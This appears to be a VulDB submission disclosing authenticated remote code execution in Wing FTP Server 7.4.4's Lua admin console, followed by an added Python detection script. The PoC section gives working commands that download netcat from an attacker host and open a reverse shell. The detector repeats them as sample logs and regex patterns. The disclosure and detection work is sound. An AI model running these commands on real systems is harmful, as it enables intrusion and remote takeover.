Submission #584253: wftpserver Wing FTP Server 7.4.4 Remote Code Execution via Lua Admin Console - Info

Title: wftpserver Wing FTP Server 7.4.4 Remote Code Execution via Lua Admin Console
Description:
Affected Version: Wing FTP Server 7.4.4 (Windows)
Authentication Required: Yes

Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.

---

POC: To execute the exploit, I logged into the application with an admin account via remote web access. The Wing FTP Server was on my Windows machine and I accessed the console via a browser on my Linux machine (the software has a remote access feature). In the Lua admin console, type the following commands:

    os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')

    os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

---

The first piece of the command will download nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute nc.exe 192.168.234.131 4443 -e cmd.exe. Now you get a reverse shell! It is possible to see at this link (https://www.wftpserver.com/serverhistory.htm) that the vendor mentions that the RCE in version 7.4.4 was fixed.
Source: https://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated/blob/main/poc.txt
User: nouvexr (UID 33215)
Submitted: 2025-05-24 04:44 PM (1 year ago)
Moderation: 2025-05-26 10:20 AM (2 days later)
Status: Accepted
VulDB Entry: 310279 [Wing FTP Server up to 7.4.3 Lua Admin Console privilege escalation]
Points: 20
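The PoC above leaves a characteristic process chain on the host: the Wing FTP service process spawns powershell/cmd, the PowerShell command line carries a download cradle with -W Hidden and -Exec Bypass, and finally nc.exe is launched with "-e cmd.exe". The script below is an added detection example, not part of the submission or of Wing FTP Server. It scans constructed Sysmon Event ID 1 (process creation) records in JSON-lines form for that chain. The service binary name wftpserver.exe is an assumption taken from the submission title; the log records are constructed to mirror the two os.execute() calls in the PoC, and the IP, port and paths are the ones the submitter used.

```python
"""Detect the process chain produced by the Wing FTP Lua-console PoC.

Added example (not from the VulDB submission or the vendor). Input is a
sequence of JSON-lines Sysmon Event ID 1 records with the usual fields
ParentImage, Image and CommandLine.
"""
import json
import re
from typing import Iterable

# Assumption: the Wing FTP service binary; confirm the image name on your host.
WING_FTP_IMAGES = {"wftpserver.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line patterns taken from the PoC's two os.execute() calls.
CMDLINE_PATTERNS = {
    "download-cradle": re.compile(
        r"net\.webclient\)?\.downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I),
    "exec-bypass": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "nc-reverse-shell": re.compile(
        r"\bnc(?:at|64)?\.exe\b.*\s-e\s+\S*cmd(?:\.exe)?\b", re.I),
}


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> list:
    """Return the detection tags that fire on one process-creation event."""
    tags = []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    # Decisive signal: the FTP service itself spawning a shell interpreter.
    if parent in WING_FTP_IMAGES and child in SHELL_IMAGES:
        tags.append("wingftp-spawns-shell")
    # Weaker signals that follow the service -> shell hop further down the chain.
    for name, pattern in CMDLINE_PATTERNS.items():
        if pattern.search(cmdline):
            tags.append(name)
    return tags


def scan(lines: Iterable[str]) -> list:
    """Parse JSON-lines process-creation records and return the flagged ones."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a malformed line instead of aborting the whole scan
        tags = analyze_event(event)
        if tags:
            findings.append({"line": n, "image": image_name(event.get("Image", "")), "tags": tags})
    return findings


# Constructed sample telemetry mirroring the PoC (not real captured logs).
WFTP = r"C:\Program Files (x86)\Wing FTP Server\wftpserver.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
NC = r"C:\Users\usuario\Desktop\Drops\nc.exe"
SAMPLE_EVENTS = [
    # 1: first os.execute() call: the service spawns PowerShell to fetch nc.exe
    {"EventID": 1, "ParentImage": WFTP, "Image": PS,
     "CommandLine": ("powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
                     "\"(New-Object Net.WebClient).DownloadFile('http://192.168.234.131:8000/nc.exe', "
                     "'" + NC + "')\"")},
    # 2: second os.execute() call: the service spawns cmd /c powershell ...
    {"EventID": 1, "ParentImage": WFTP, "Image": CMD,
     "CommandLine": ("cmd /c powershell -NoP -W Hidden -Command \"Start-Process \\\"" + NC +
                     "\\\" -ArgumentList \\\"192.168.234.131\\\",\\\"4443\\\",\\\"-e\\\",\\\"cmd.exe\\\"\"")},
    # 3: the PowerShell child of that cmd (parent is cmd, so only command-line tags)
    {"EventID": 1, "ParentImage": CMD, "Image": PS,
     "CommandLine": "powershell -NoP -W Hidden -Command \"Start-Process \\\"" + NC + "\\\" ...\""},
    # 4: nc.exe itself, launched with the reverse-shell arguments
    {"EventID": 1, "ParentImage": PS, "Image": NC,
     "CommandLine": "\"" + NC + "\" 192.168.234.131 4443 -e cmd.exe"},
    # 5: benign administrator PowerShell started from the desktop
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -Command Get-Service"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f['line']}: {f['image']} -> {', '.join(f['tags'])}")
```

The parent/child rule is the one worth alerting on by itself: a file-transfer service has no business launching cmd or powershell, whatever the command line looks like, and it still fires when the attacker swaps the download cradle and netcat for something quieter. The command-line tags are supporting context and are only as good as the PoC they were written from.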
